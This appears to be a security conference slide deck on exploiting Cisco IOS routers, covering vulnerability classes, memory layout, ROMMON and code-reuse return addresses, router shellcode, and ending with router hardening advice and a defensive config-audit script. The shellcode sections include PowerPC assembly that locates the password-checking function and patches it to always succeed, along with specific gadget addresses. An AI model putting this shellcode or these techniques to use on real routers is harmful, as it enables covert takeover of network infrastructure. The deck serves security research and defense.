Architectural considerations
Introduction









Exploitation of router vulnerabilities has been shown independently before

■ Primary focus on Cisco IOS

Notable incidents in the wild have not been registered within the security community

■ Successful but unnoticed attacks are unlikely, due to the fragile nature of the target (more on this later)

All publicized incidents were based on:

■ Configuration issues

■ Insider attacks

■ Trivially exploitable functional vulnerabilities

The limited data from Recurity Labs CIR Online supports that observation
Motivation

Everything handling even remotely remote data gets exploited all the time

■ It has been established that control over infrastructure equipment is desirable for an attacker

■ Therefore, unique obstacles obviously prevent wide-scale & high quality exploitation of routers

■ Knowing these obstacles is the way to notice developments in which the same are overcome

■ These developments will herald a new age
Vulnerabilities in Routers

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
Vulnerabilities

There is comparably little public vulnerability research for network equipment

■ In 2008, only 14 vulnerabilities in Cisco IOS published

■ Juniper only reports a memory leak and OpenSSL issues

■ Nothing on Nortel Networks

Vulnerabilities are often fixed as functional issues and classified accordingly

■ E.g. "malformed packet crashes router"

■ Will not make it into the vulnerability databases
- Information only accessible to customers
Service Vulnerabilities

Vulnerabilities in network facing services were the big deal in network leaf nodes (aka. servers)

Routers run network services too

■ Remote administration interfaces

■ SNMP (see CVE-2008-0960)

■ TFTP / FTP / HTTP Services

■ Never used in well configured networks

■ Sloppily managed networks don't need router exploits

Most custom implementations of router services had vulnerabilities in the past

■ Apart from fixes, little changes over versions

■ No new vulnerabilities introduced









Recurity Labs

Service Vulnerabilities









Routers expose little functionality to truly remote attackers

■ Routing protocols are run "internally"

■ EIGRP / OSPF require multicast access

■ RIP is too simple to be buggy :)

■ BGP requires explicit peer configuration

■ DTP / VTP / CDP / etc. require local link access

■ ISIS isn't even IP

Within a multicast domain, routers are at risk

In the Internet, network engineering principles say: You shall not accept routing information from arbitrary hosts.
Service Vulnerabilities

A notable exception from the rules: cisco-sa-20070124-crafted-ip-option

Triggered by:

■ Internet Control Message Protocol (ICMP)

■ Protocol Independent Multicast version 2 (PIMv2)

■ Pragmatic General Multicast (PGM)

■ URL Rendezvous Directory (URD)

Vulnerability caused by individual parsing code in IOS

■ IP Options parsed after an End-of-Options (0x00) was found

■ Stack based buffer overflow in the attempt to reverse a source route for the generated ICMP reply

It is not uncommon for routers to get pinged
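The option walk the advisory describes, as an added example (not code from the slides or from Cisco): a strict IPv4 options parser that stops at the first End-of-Options byte, validates every length field, and reverses a recorded source route only after bounds-checking its pointer. The option bytes are constructed for this example; option type values are the IANA-assigned ones from RFC 791.

```python
# Added example, not from the slides: strict IPv4 option handling.
# Option type values are the IANA-assigned ones (RFC 791).
IPOPT_EOL, IPOPT_NOP, IPOPT_LSRR, IPOPT_SSRR = 0, 1, 131, 137
MAX_OPTIONS_LEN = 40  # IHL caps the header at 60 bytes, so 40 bytes of options


def parse_ip_options(opts):
    """Walk the options field of an IPv4 header.

    Returns (options, trailing): options is a list of (type, body) tuples,
    trailing is the raw bytes after the first EOL byte.  Parsing stops at
    EOL; whatever follows is padding and is never interpreted, which is the
    check the slide says the IOS parser lacked.  Bad lengths raise.
    """
    if len(opts) > MAX_OPTIONS_LEN:
        raise ValueError("options field longer than 40 bytes")
    options, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == IPOPT_EOL:
            return options, opts[i + 1:]
        if kind == IPOPT_NOP:
            options.append((kind, b""))
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option %d has no length byte" % kind)
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("option %d has bad length %d" % (kind, length))
        options.append((kind, opts[i + 2:i + length]))
        i += length
    return options, b""


def reverse_source_route(body):
    """Reverse the recorded route of an LSRR/SSRR option body (pointer byte
    followed by 4-byte addresses) so a reply can travel back along it.
    The pointer is relative to the option start and must sit on an address
    boundary no further than one past the last address; anything else is
    rejected rather than used as a copy index (the slide attributes the
    IOS overflow to this reversal step).  Returns hops as dotted strings,
    last hop first."""
    if not body:
        raise ValueError("empty source route option")
    pointer, route = body[0], body[1:]
    if len(route) % 4:
        raise ValueError("route data is not a multiple of 4 bytes")
    if pointer < 4 or pointer > len(route) + 4 or (pointer - 4) % 4:
        raise ValueError("source route pointer %d out of bounds" % pointer)
    hops = [route[k:k + 4] for k in range(0, len(route), 4)]
    return [".".join(str(b) for b in hop) for hop in reversed(hops)]


def is_valid_source_route(body):
    """True when reverse_source_route() accepts the option body."""
    try:
        reverse_source_route(body)
        return True
    except ValueError:
        return False


def options_after_eol(opts):
    """Detection helper: True if a non-zero byte follows the first EOL.
    Conforming senders pad with zeros, so this alone is worth logging."""
    _, trailing = parse_ip_options(opts)
    return any(trailing)


# Constructed sample: NOP, a loose source route via 10.0.0.1 and 10.0.0.2,
# then EOL, then a second LSRR option hidden behind the EOL byte.
SAMPLE_OPTIONS = bytes([
    IPOPT_NOP,
    IPOPT_LSRR, 11, 4, 10, 0, 0, 1, 10, 0, 0, 2,
    IPOPT_EOL,
    IPOPT_LSRR, 7, 4, 192, 0, 2, 1,
])

if __name__ == "__main__":
    parsed, trailing = parse_ip_options(SAMPLE_OPTIONS)
    print("options:", parsed)
    print("bytes after EOL:", trailing.hex())
    print("reply route:", reverse_source_route(parsed[1][1]))
    print("anomalous:", options_after_eol(SAMPLE_OPTIONS))
```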
Upcoming Vulnerabilities

The landscape changes. Routers now support:

■ IPv6

■ VoIP: H.323, H.225.0, H.245.0, SIP

■ Lawful Interception Functionality

■ SSL VPN

■ Web Service Routing

■ XML-PI

■ Web Service Management Agent

Huawei Quidway access routers come with H.323 services enabled by default

Luckily, adoption is slow.

■ Network engineers just don't want application level functionality on their devices.
Client Side Vulnerabilities

Routers are rarely used as clients

■ Exceptions are:

■ Telnet / SSH connections into other routers

■ File transfers from / to the router

■ Authentication services (RADIUS, TACACS+)

■ Name resolution (DNS) - potentially unintentional

■ The new services will change that as well

■ Routers talking to VoIP infrastructure

■ Routers talking to HTTP servers

■ Up until now, Client Side doesn't play a role.
Transit Vulnerabilities

Most powerful: Vulnerabilities triggered by traffic passing through the router

■ Would be really bad if triggered after forwarding

Most unlikely: Routers try really hard to not look at traffic

■ Inspecting packets is expensive

■ Forwarding should be handled in hardware as much and as often as possible

Some traffic must be inspected on every hop

■ Source routed packets

■ Hop-by-Hop headers in IPv6

No true Transit Vulnerability known so far
Vulnerabilities in Routers

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
OS Architectures Comparison

Product                OS Design          Fault Behavior                Exploitability
Cisco IOS              Monolithic ELF     Device Crash                  Hard
Cisco Service Modules  Linux 2.4 based    Process Crash / Module Crash  Interesting
Juniper JUNOS          FreeBSD 3.x based  Process Crash                 Probably known
Huawei VRP (1)         VxWorks 5.x based  Device Crash                  A little tricky
Huawei VRP (2)         Linux 2.x based    Process Crash                 Known
$DSL_Router            Linux 2.x based    Process Crash                 Known
The Easy Ones

Router operating systems based on standard UNIX architectures are comparatively easy to exploit

■ Virtual address spaces for every process

■ No fancy protection mechanisms

■ Most things run as UID 0

Everything behaves the way attackers know it
The Hard One

IOS is a single large binary program (ELF) running directly on the main CPU

■ Shared memory architecture

■ Virtual memory mapping according to ELF header

■ CPU (PPC32, MIPS32 or MIPS64) in Supervisor mode

One single shared Heap

■ Doubly-linked list of memory blocks

Processes are threads with CPU context and stack block allocated on the heap

■ No virtual memory space

Run-to-completion scheduler (like Windows 95)
Consequences of Design

IOS cannot recover from exceptions

■ Any exception causes the device to restart

IOS cannot recover from memory corruptions

■ If the heap linked list is corrupted, the device restarts

■ Integrity checks on the heap are performed with every allocation / de-allocation

■ Additional integrity tests are performed by CheckHeaps

IOS cannot recover from CPU hogs

■ If a process does not return execution to the scheduler, a CPU watchdog restarts the device
IOS Memory Layout

Memory is laid out based on the image base

IO memory is laid out based on physical interfaces and configuration

Static address

Start       End         Size(b)   Class   Media   Name
0x03C00000  0x03FFFFFF   4194304  Iomem   R/W     iomem
0x60000000  0x60FFFFFF  16777216  Flash   R/O     flash
0x80000000  0x83BFFFFF  62914560  Local   R/W     main
0x8000808C  0x8095B087   9777148  IText   R/O     main:text
0x8095B088  0x80CDBFCB   3673924  IData   R/W     main:data
0x80CDBFCC  0x80DECEE7   1117980  IBSS    R/W     main:bss
0x80DECEE8  0x83BFFFFF  48312600  Local   R/W     main:heap
The IOS Image Hell

Every IOS image is built from scratch

Contents of the build decided by:

■ Platform

■ Major / Minor Version

■ Release Version

■ Train

■ Feature-Set

■ Special Build

272722 different IOS Images known to the Cisco Feature Navigator on CCO in June 2009

■ Theoretically, this means as many memory layouts
The IOS Image Hell

For exploitation that means:

■ Assumptions about locations of specific code have a chance of 0.000366% to be correct

■ Assumptions about the start of the Heap are just as good

■ Since Stacks are Heap allocated blocks of memory, correct guesses about the stack location are even less likely

IOS's build process provides a far higher unpredictability of memory layout than any ASLR technology currently in use!
The IOS Image Hell

The image diversity is also a problem for shellcode

■ The whole thing is compiled at once

■ The image does not contain any symbols

■ The image does not contain an exported list of functions

■ There is no guarantee that structures are equal between images

■ In fact, it's almost guaranteed that someone at Cisco decided to expand or reorder a structure because they felt like it.

Use of platform code (what shellcode normally does) is not so easy on IOS.
Vulnerabilities in Routers

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
Where to (re)turn to?

Stack: it's somewhere in the heap (unpredictable)

IOS Code: its location depends on the image version

■ You would need to know the image version, which you don't

■ You would need to have a copy of exactly that image, which you don't

IOS data/rodata/bss sections: location and structure depend on the image version

■ Comparing 1597 images for Cisco 2600, only 24 (1.5%) have a section (.data) at the same address

■ 12.4 images seem to use alignment for sections now

IOMEM: useless, not executable

Heap spray: not applicable

■ attacker has rarely any control over the heap

Partial overwrites are not an option either, as IOS runs on PPC32, MIPS32 and MIPS64 in Big Endian mode
The Current Best Bet

Cisco routers use a bootstrap loader called ROMMON

■ ROMMON is mapped initially into memory through hardware initialization

■ ROMMON provides a very basic CLI

■ ROMMON provides the initial exception handlers

ROMMON is mapped at fixed addresses

■ 0xFFF00000 for Cisco 1700

■ 0xFFF00000 for Cisco 2600

■ 0x1FC00000 for Cisco 3640

■ 0x1FC00000 for Cisco 3660
ROMMON Versions

ROMMON Version distribution is a lot smaller

ROMMON is rarely updated

■ Therefore, versions depend on shipping date

■ Cisco prefers bulk sales of devices

[Chart: C2600 Version ROMMON Distribution (based on Google searches)]

[Chart: ROMMON Version Distribution in a real world network (571 devices)]
Return Oriented Programming*

Chaining together function epilogs before return to gain arbitrary functionality

■ One of these hacking techniques that every sufficiently talented hacker with a need came up with independently

Has been shown to work nicely on IA-32 and SPARC code using an entire glibc

■ We have 146556 bytes (36639 instructions) and a PowerPC CPU that returns via LR

* "Return-oriented Programming: Exploitation without Code Injection"
Erik Buchanan, Ryan Roemer, Stefan Savage, Hovav Shacham - University of California, San Diego
http://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf
Return Oriented on PowerPC

[Figure: stack of the overflowed function, from the buffer upwards: Buffer, Buffer, Buffer, Buffer ("here be buffer overflow"), saved R30, saved R31, saved SP, saved LR]

Function epilog:

  lwz %r0, 0x20+arg_4(%sp)
  mtlr %r0
  lwz %r30, 0x20+var_8(%sp)
  lwz %r31, 0x20+var_4(%sp)
  addi %sp, %sp, 0x20
  blr

FUNC_02: Memory write!

  stw %r30, 0xAB(%r31)
  lwz %r0, 0x18+arg_4(%sp)
  mtlr %r0
  lwz %r28, 0x18+var_10(%sp)
  lwz %r29, 0x18+var_C(%sp)
  lwz %r30, 0x18+var_8(%sp)
  lwz %r31, 0x18+var_4(%sp)
  addi %sp, %sp, 0x18
  blr

[Figure: frame consumed by FUNC_02: saved R28, saved R29, saved R30, saved R31, saved SP, saved LR, stuff]
Too Much Cache

PowerPC has separate instruction and data caches

Executing data you just wrote doesn't work

[Figure: memcpy() / return; CPU with separate D-Cache and I-Cache in front of Memory]
More Code Reuse

The Bootstrap code already brings functionality that we need:

Disable all caches!

IOS doesn't care

  stwu %sp, -0x10(%sp)
  mflr %r0
  stw %r31, 0x10+var_4(%sp)
  stw %r0, 0x10+arg_4(%sp)
  bl Disable_interrupts
  mr %r31, %r3
  mfspr %r0, dc_cst
  cmpwi cr1, %r0,
  bge cr1, NoDataCache
  bl Flush_Data_Cache
  bl unlock_Data_Cache
  bl Disable_Data_Cache
NoDataCache:
  bl invalidate_instruction_cache
  bl unlock_instruction_cache
  bl Disable_instruction_cache
  mfmsr %r0
  rlwinm %r0, %r0, 0,28,25
  mtmsr %r0
  cmpwi cr1, %r31,
  beq cr1, InterruptsAreOff
  bl Enableinterrupts
InterruptsAreOff:
  lwz %r0, 0x10+arg_4(%sp)
  mtlr %r0
  lwz %r31, 0x10+var_4(%sp)
  addi %sp, %sp, 0x10
  blr
Reliable Code Execution

Getting away with it

Reliable code execution is nice, but an attacker needs the device to stay running

■ We can't just keep running our shellcode, remember the Windows 95 scheduler?

Andy Davis et al. have called the TerminateProcess function of IOS

■ Needs the address of this function, which is again image dependent

■ Exactly what is not wanted!

■ Crucial processes should not be terminated

■ IP Options vulnerability exploits "IP Input"
Getting away with it

Remember the stack layout?

We search the stack for a stack frame sequence of SP & LR upwards

■ Once found, we restore the stack pointer and return to the caller

This is reliable across images, as the call stack layout does not change dramatically over releases

This has been shown to be mostly true on other well exploited platforms

[Figure: stack frame: saved R28, saved R29, saved R30, saved R31, saved SP, saved LR, stuff]
The Downside of ROMMON

You need to have a copy of the respective ROMMON for disassembly

■ ROMMON updates are available on CCO

■ The interesting (read: old) versions are not

You cannot remotely fingerprint ROMMON

■ It is unused dormant code

You still need to know what hardware platform you are dealing with

Alternatives to ROMMON

What if we could use the same technique, but return into the IOS image code?

■ We can remotely fingerprint the IOS image

But aren't the image addresses all random?

■ Well, that's exactly the question

Performing an extensive search over multiple IOS images for the same platform

■ Requiring a BLR instruction

■ Requiring LR restore via stack (R1)

■ Requiring write to pointer in R26-R31

■ Requiring single basic block
Code Similarity (4 images)

The same function at the same address range (8001435c - 800143a0) in Cisco 2600 images 12.2(28c), 12.2(29b), 12.2(37) and 12.2(46), across the a3jk8s, a3js, i and io3 feature sets. Two variants occur.

In the 12.2(28c) and 12.2(37) images (c2600-a3jk8s, c2600-a3js, c2600-i, c2600-io3):

  8001435c  stw r29,36(r30)
  80014360  li r0,36
  80014364  sth r0,68(r30)
  80014368  mr r3,r30
  8001436c  lwz r0,36(r1)
  80014370  mtlr r0
  80014374  lwz r27,12(r1)
  80014378  lwz r28,16(r1)
  8001437c  lwz r29,20(r1)
  80014380  lwz r30,24(r1)
  80014384  lwz r31,28(r1)
  80014388  addi r1,r1,32
  8001438c  blr

In the 12.2(29b) and 12.2(46) images (same feature sets):

  8001435c  sth r3,18(r31)
  80014360  stw r27,184(r30)
  80014364  lwz r9,92(r27)
  80014368  lhz r0,414(r9)
  8001436c  sth r0,72(r30)
  80014370  stw r29,36(r30)
  80014374  li r0,36
  80014378  sth r0,68(r30)
  8001437c  mr r3,r30
  80014380  lwz r0,36(r1)
  80014384  mtlr r0
  80014388  lwz r27,12(r1)
  8001438c  lwz r28,16(r1)
  80014390  lwz r29,20(r1)
  80014394  lwz r30,24(r1)
  80014398  lwz r31,28(r1)
  8001439c  addi r1,r1,32
  800143a0  blr
Code Dissimilarity

c2600-a3jk8s-mz.122-28c:

  stw r29,36(r30)
  li r0,36
  sth r0,68(r30)
  mr r3,r30
  lwz r0,36(r1)
  mtlr r0
  lwz r27,12(r1)
  lwz r28,16(r1)
  lwz r29,20(r1)
  lwz r30,24(r1)
  lwz r31,28(r1)
  addi r1,r1,32
  blr

c2600-a3jk8s-mz.122-29b:

  sth r3,18(r31)
  stw r27,184(r30)
  lwz r9,92(r27)
  lhz r0,414(r9)
  sth r0,72(r30)
  stw r29,36(r30)
  li r0,36
  sth r0,68(r30)
  mr r3,r30
  lwz r0,36(r1)
  mtlr r0
  lwz r27,12(r1)
  lwz r28,16(r1)
  lwz r29,20(r1)
  lwz r30,24(r1)
  lwz r31,28(r1)
  addi r1,r1,32
  blr

[Screenshot: Cisco Feature Navigator comparing the two images. First image: Release Number 12.2(28c), platform 2610-2613, Feature Set/License(s). Second image: Major Release 12.2, Release Number 12.2(29b), platform 2610-2613, Feature Set/License(s). "Common Features in Both Images": Identical Features!]
Code Similarity Results

Count  Percent  Address   Type
1597   100%               Cisco 2600 IOS 12.1 - 12.4 with all possible feature sets
326    20.4%    80009534  Arbitrary memory write
249    15.6%    80040990  Fixed memory write
224    14.0%    80014360  Arbitrary memory write
223    13.9%    80040984  Fixed memory write
210    13.1%    80018554  Memory write with R0
ROMMON vs. Code Similarity

ROMMON

■ Perfect addresses (no dependencies)

■ Cache disabling

■ 30% chance of success based on in-the-wild data

■ Cannot be fingerprinted

Image Similarity

■ Likely addresses (code flow dependencies)

■ Cache still an issue

■ 13% - 20% chance of success over all available images

■ Can be fingerprinted
Return Address Dilemma Summary

The return address is one of the hardest problems in IOS exploitation

The ROMMON method is reliable

■ Iff you know or guess the ROMMON version

Code similarity appears to be promising

■ Experiments only had access to 1597 of 5961 images available for Cisco 2610-2613 (26.8%)

Work in progress...
Vulnerabilities in Routers

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
IOS Shellcode

Shellcode for PPC32 and MIPS32/64 is big

■ In stack overflows, it's easy to cross the heap block boundary and corrupt the heap

■ Heap repairing stack shellcode can be used to temporarily repair the heap until CheckHeaps verifies it or the following heap block's content is used by IOS

■ The stack should stay partially clean, so the return into a caller still works

Second stage code is almost always required

■ IOMEM base addresses are not stable

Searching IOMEM is not reliable yet, but works

IOMEM searching will be harder on larger devices
Bind Shellcode

Shellcode can create or modify VTYs

■ VTYs can be exposed by Telnet, RSH or SSH

■ Such shellcode has been shown before

To create a VTY, IOS functions must be called

■ Using fixed addresses in the image is (again) not an option

Alternatively, IOS data structures can be modified

■ Using fixed addresses of the data structure is wrong

■ Using fixed offsets within the data structure is also not reliable, as such offsets change frequently

AAA configurations must be observed!
Alternative Shellcode Approach

Shellcode can modify the actual runtime code instead of using it

■ Only a single code point must be identified

■ To cover AAA configurations, a second code point is needed

Modified runtime image no longer validates passwords

■ Alternative use for the same method is disabling ACL matching

■ Can become tricky when ACLs are used for other purposes than just filtering incoming traffic

How to find the address of the function?
Disassembling Shellcode

When searching for code manually, one often follows string references

[IDA screenshot: .rodata strings "Password: " and "%% Bad passwords\n" (aBadPasswords), each with DATA XREFs from sub_802B2378; the xref window shows an addi instruction loading aBadPasswords@l at .text:802B2668]
Disassembling Shellcode

Shellcode can do the same:

1. Find a unique string to determine its address

2. Find a code sequence of LIS / ADDI loading the address of this string

■ Watch out for variants using the negative equivalent

■ Watch out for variants using ORI instead of ADDI

3. Go backwards until you find the STWU %SP instruction, marking the beginning of the function

4. Patch the function to always return TRUE
Disassembling Shellcode

  bl .code
  .string "unique String to look for"
  .byte 0x00
  .byte 0x00
.code:
  mflr %r3
  lmw %r29, 0x0(%r3)
  lis %r3, 0x8000
  ori %r3, %r3, 0x8000
  mr %r5, %r3
.find_r29:
  lwz %r4, 0x0(%r3)
  cmpw %cr1, %r4, %r29
  bne %cr1, .findnext
  lwz %r4, 0x4(%r3)
  cmpw %cr1, %r4, %r30
  bne %cr1, .findnext
  lwz %r4, 0x8(%r3)
  cmpw %cr1, %r4, %r31
  beq %cr1, .stringfound
.findnext:
  addi %r3, %r3, 4
  b .find_r29
.stringfound:
  # string address is now in R3
  lis %r7, 0x3800
  rlwinm %r6, %r3, 16, 16, 31
  andi. %r8, %r3, 0xFFFF
  or %r8, %r8, %r7
  or %r7, %r7, %r6
.findlis:
  lwz %r4, 0x0(%r5)
  rlwinm %r4, %r4, 0, 0xF81FFFFF
  cmpw %cr1, %r4, %r7
  bne %cr1, .findlisnext
  lwz %r4, 0x4(%r5)
  rlwinm %r4, %r4, 0, 0xF800FFFF
  cmpw %cr1, %r4, %r8
  beq %cr1, .loadfound
.findlisnext:
  addi %r5, %r5, 4
  b .findlis
.loadfound:
  xor %r6, %r6, %r6
  ori %r6, %r6, 0x9421
  lhz %r4, 0x0(%r5)
  cmpw %cr1, %r4, %r6
  beq %cr1, .functionFound
  addi %r5, %r5, -4
  b .loadfound
.functionFound:
  lis %r4, 0x3860
  ori %r4, %r4, 0x0001
  stw %r4, 0x0(%r5)
  addi %r5, %r5, 4
  lis %r4, 0x4e80
  ori %r4, %r4, 0x0020
  stw %r4, 0x0(%r5)
Advanced Ideas: TCL Loader

Later IOS versions include TCL interpreters

■ API exposed to the user

■ Fully featured script interpreter

Shellcode should be able to instantiate a new TCL interpreter

■ Download third stage TCL script from remote location via TFTP (supported by IOS)

■ Potentially modify interpreter to give raw memory access if required

Christoph Weber's PH-Neutral 0x7d9 talk

Wet Dreams: The IOS Sniffer

Turning any Cisco IOS router into a full password sniffer is a naive idea

■ The product line is designed for fast packet forwarding

■ Speed is achieved by doing as much as possible in hardware

■ "Punting" packets to perform DPI is going to kill the router with load

■ Might work on low load access routers

Lawful Interception code might change this

■ Increasing deployment in carrier networks (Hello Zensursula!)

■ Designed to intercept specific communication

■ Designed to be invisible to the network operator

The code is there, no matter if the MIBs are loaded
IOS MITM

Using IOS as MITM tool has the same general problems as an arbitrary packet sniffer

Depending on feature-set, however, the functionality might already be there

■ "TCP Intercept" can report TCP SEQ/ACK to a third party

- Allowing to inject any traffic into the TCP stream

■ DNS code can report TIDs to a third party

- Allowing to spoof any DNS response

■ Load balancing features can redirect HTTP requests for arbitrary hosts
Vulnerabilities in Routers

Architectural Considerations 

The Return Address Dilemma 

Shellcode for Routers 

Protecting Routers 
General Router Protection

Good luck!

Prevent traffic destined to any interface of the router itself at all cost

■ Very specific exceptions for network management

■ Don't forget the loopback and tunnel interfaces

■ Don't forget IPv6

Protect your routing protocol updates with MD5

Don't run network services on routers

■ HTTP/HTTPS/FTP/TFTP/etc. are out of the question

■ No matter what Cisco says, don't run VoIP services

Monitor your Service Modules independently

Monitor Configs and Crashes

Use a configuration monitoring tool like RANCID ("Really Awesome New Cisco confIg Differ")

■ Detects manual configuration changes, new interfaces, new tunnels, etc.

■ Data structure modifications are visible in the configuration

■ Check http://www.shrubbery.net/rancid/

Configure Core Dumping

■ For critical systems, increase Flash memory, so the entire set of core files can be stored locally

■ For corporate networks, configure core dumping to a central FTP server

Check the http://cir.recurity-labs.com wiki for more
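The two protection slides above turned into a check, as an added example (not code from the slides, from RANCID or from Cisco): a small audit of an IOS running-config for application services left enabled, OSPF areas and BGP neighbors without MD5 authentication, and a missing core dump target. The configuration is constructed for the example; the commands matched are standard IOS ones, and the per-interface OSPF message-digest-key is a second check not covered here.

```python
# Added example, not from the slides: audit an IOS configuration for the
# hardening points on the protection slides.  SAMPLE_CONFIG is constructed.
import re

# Application services the slides say a router should not be running.
SERVICE_PATTERNS = (
    (r"^ip http server$", "HTTP server"),
    (r"^ip http secure-server$", "HTTPS server"),
    (r"^ftp-server enable$", "FTP server"),
    (r"^tftp-server ", "TFTP server"),
    (r"^sip-ua$", "VoIP (SIP user agent)"),
    (r"^dial-peer voice ", "VoIP (dial peer)"),
)

SAMPLE_CONFIG = """\
hostname edge-1
ip http server
no ip http secure-server
ftp-server enable
router ospf 1
 area 0 authentication message-digest
 network 10.0.0.0 0.0.0.255 area 0
 network 10.0.1.0 0.0.0.255 area 1
router bgp 65001
 neighbor 192.0.2.2 remote-as 65002
 neighbor 192.0.2.2 password EXAMPLE-BGP-KEY
 neighbor 192.0.2.6 remote-as 65003
exception core-file edge-1-core
"""


def parse_sections(text):
    """Split an IOS config into (command, [subcommands]) pairs: top-level
    lines open a section, indented lines attach to the preceding one."""
    sections = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw.startswith(" ") and sections:
            sections[-1][1].append(raw.strip())
        else:
            sections.append((raw.strip(), []))
    return sections


def _matches(pattern, lines):
    """Set of the first capture group for every line matching pattern."""
    return {m.group(1) for m in (re.match(pattern, line) for line in lines) if m}


def audit_services(sections):
    # A command prefixed with "no" never matches the anchored patterns.
    return [f"{name} enabled ('{cmd}'): routers should not run application services"
            for cmd, _ in sections
            for pattern, name in SERVICE_PATTERNS if re.match(pattern, cmd)]


def audit_ospf(cmd, body):
    """Every area that carries networks needs message-digest authentication."""
    used = _matches(r"network \S+ \S+ area (\S+)$", body)
    authed = _matches(r"area (\S+) authentication message-digest$", body)
    return [f"{cmd}: area {a} carries networks without MD5 authentication"
            for a in sorted(used - authed)]


def audit_bgp(cmd, body):
    """Every configured neighbor needs a session password (TCP MD5)."""
    peers = _matches(r"neighbor (\S+) remote-as ", body)
    keyed = _matches(r"neighbor (\S+) password ", body)
    return [f"{cmd}: neighbor {p} has no MD5 password"
            for p in sorted(peers - keyed)]


def audit_core_dump(sections):
    """A core file needs somewhere to go: a dump host or local flash."""
    cmds = [cmd for cmd, _ in sections]
    if any(c.startswith(("exception dump ", "exception flash ")) for c in cmds):
        return []
    return ["no 'exception dump' or 'exception flash' target: "
            "a crash leaves no core file to analyse"]


def audit(text):
    """Run all checks over a config text and return the list of findings."""
    sections = parse_sections(text)
    findings = audit_services(sections)
    for cmd, body in sections:
        if cmd.startswith("router ospf "):
            findings += audit_ospf(cmd, body)
        elif cmd.startswith("router bgp "):
            findings += audit_bgp(cmd, body)
    return findings + audit_core_dump(sections)


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print("-", finding)
```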
Complain to Cisco

Nobody updates IOS and it is entirely Cisco's fault

■ New IOS versions interpret configurations differently

■ New IOS versions have different defaults

■ Not even Cisco engineers know which

Nobody can update a network if the result would be massive downtimes and outages

■ Decent network engineers run 12.2

■ Brave network engineers run 12.3

■ VoIPioneers run 12.4 (and fail)

Make Cisco provide clear upgrade paths

■ Guarantee that 12.2(13)T17 Telco -> 12.4(9)T6 Telco actually works

■ Provide tools for automatic configuration adjustment

Cisco, Do Your Job!
Complain to Juniper, Huawei,

The lack of security advisories for the other big router vendors can only mean:

1. Their stuff is perfectly secure

2. Their stuff gets fixed silently

3. Their stuff doesn't even get internal security testing

While silently fixing security bugs is a trend (thanks Linus!), it's not acceptable for infrastructure equipment

Cisco is actually doing a better job than everyone else in the networking industry when it comes to product security. PSIRT FTW!

Thank you!